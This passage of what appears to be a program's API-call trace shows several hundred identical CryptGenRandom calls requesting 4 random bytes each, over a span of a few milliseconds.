CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.171] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.172] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.173] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 